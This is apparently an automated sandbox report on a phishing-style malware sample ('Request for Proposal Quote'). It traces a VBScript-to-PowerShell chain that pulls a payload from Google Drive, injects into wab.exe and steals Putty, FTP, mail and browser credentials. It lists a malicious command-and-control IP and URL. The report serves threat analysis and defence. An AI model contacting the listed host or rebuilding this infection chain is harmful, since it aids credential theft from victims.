Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000009.00000002.3336499423.00000000054C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 5496, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1428348 Sample: Request for Proposal Quote_... Startdate: 18/04/2024 Architecture: WINDOWS Score: 100 37 drive.usercontent.google.com 2->37 39 drive.google.com 2->39 41 bg.microsoft.map.fastly.net 2->41 53 Snort IDS alert for network traffic 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 Antivirus detection for URL or domain 2->57 59 5 other signatures 2->59 9 wscript.exe 2 2->9         started        signatures3 process4 file5 33 C:\Users\user\AppData\...\Rundturens.txt, ASCII 9->33 dropped 61 VBScript performs obfuscated calls to suspicious functions 9->61 63 Suspicious powershell command line found 9->63 65 Wscript starts Powershell (via cmd or directly) 9->65 67 2 other signatures 9->67 13 powershell.exe 14 19 9->13         started        signatures6 process7 dnsIp8 45 drive.usercontent.google.com 173.194.219.132, 443, 49706, 49716 GOOGLEUS United States 13->45 47 drive.google.com 173.194.219.138, 443, 49705, 49715 GOOGLEUS United States 13->47 77 Suspicious powershell command line found 13->77 79 Very long command line found 13->79 81 Found suspicious powershell code related to unpacking or dynamic code loading 13->81 17 powershell.exe 17 13->17         started        20 conhost.exe 13->20         started        22 cmd.exe 1 13->22         started        signatures9 process10 signatures11 49 Writes to foreign memory regions 17->49 51 Found suspicious powershell code related to unpacking or dynamic code loading 17->51 24 wab.exe 1 88 17->24         started        29 cmd.exe 1 17->29         started        31 wab.exe 17->31         started        process12 dnsIp13 43 24.199.107.111, 49717, 49718, 49719 TWC-12271-NYCUS United States 24->43 35 C:\Users\user\AppData\Roaming\...\31437F.exe, PE32 24->35 dropped 69 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 24->69 71 Tries to steal Mail credentials (via file / registry access) 24->71 73 Tries to harvest and steal ftp login credentials 24->73 75 Tries to harvest and steal browser information (history, passwords, etc) 24->75 file14 signatures15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
24.199.107.111
 unknown United States
12271 TWC-12271-NYCUS true
173.194.219.138
 drive.google.com United States
15169 GOOGLEUS false
173.194.219.132
 drive.usercontent.google.com United States
15169 GOOGLEUS false

Contacted Domains

Name IP Active
bg.microsoft.map.fastly.net 199.232.210.172 true
drive.google.com 173.194.219.138 true
drive.usercontent.google.com 173.194.219.132 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://24.199.107.111/index.php/927339792 true
    		unknown